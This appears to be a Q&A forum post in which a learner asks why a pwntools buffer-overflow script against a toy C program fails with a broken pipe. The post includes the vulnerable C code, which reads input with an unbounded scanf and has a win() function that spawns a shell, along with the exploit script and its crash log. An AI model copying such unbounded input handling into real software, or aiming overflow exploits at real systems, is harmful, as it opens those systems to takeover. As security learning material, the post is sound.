# Why do I get a broken pipe when using pwntool with this C code

Tags: buffer-overflow, c

I am learning about Buffer Overflows (BOF) and came up with this piece of C code:

```
#include <stdio.h>
#include <stdlib.h>

void win()
{
        system("/bin/bash");
}

int main()
{
        char s[128];
        scanf("%s",&s);
        printf("%s\n", s);
        return 0;
}
```

Using `pwntools` I wrote the following script:

```
from pwn import * 
context.binary = binary = "./test"

payload = b"A"*(0x80)+p64(0x1159)

p = process()
p.sendline(payload)
p.interactive()
```

This does not work and throws a Broken Pipe error:

```
[*] '/home/kali/simple_bof/test'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Starting local process '/home/kali/simple_bof/test': pid 40126
[*] Switching to interactive mode
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAY\x11[*] Got EOF while reading in interactive
$ 
[*] Process '/home/kali/simple_bof/test' stopped with exit code -11 (SIGSEGV) (pid 40126)
[*] Got EOF while sending in interactive
Traceback (most recent call last):
  File "/home/kali/.local/lib/python3.9/site-packages/pwnlib/tubes/process.py", line 746, in close
    fd.close()
BrokenPipeError: [Errno 32] Broken pipe
```

I am clueless to why this is happening and all of my search attempts didn't yield anything useful

I tried compiling in many ways but the end result is the same (broken pipe), I tested with the following flags

```
-fno-stack-protector
-no-pie
-m32 (used p32 for this one )
```

Answer (score 0, accepted):

The broken pipe happened because your program died with a `SIGSEGV` and therefore  the interactive session that `pwntools` was trying to open wasn't possible to establish (in the log said it has received an end of file (`EOF`)). It's all written in the log, when you look for an error you should look at the first failing line not the last one :)

Probably the offset where to place the value to overwrite the `EIP` is wrong or maybe the `PIE` is enabled or the `ASLR` is not disabled.

You should attach a debugger and find out where the process is dying.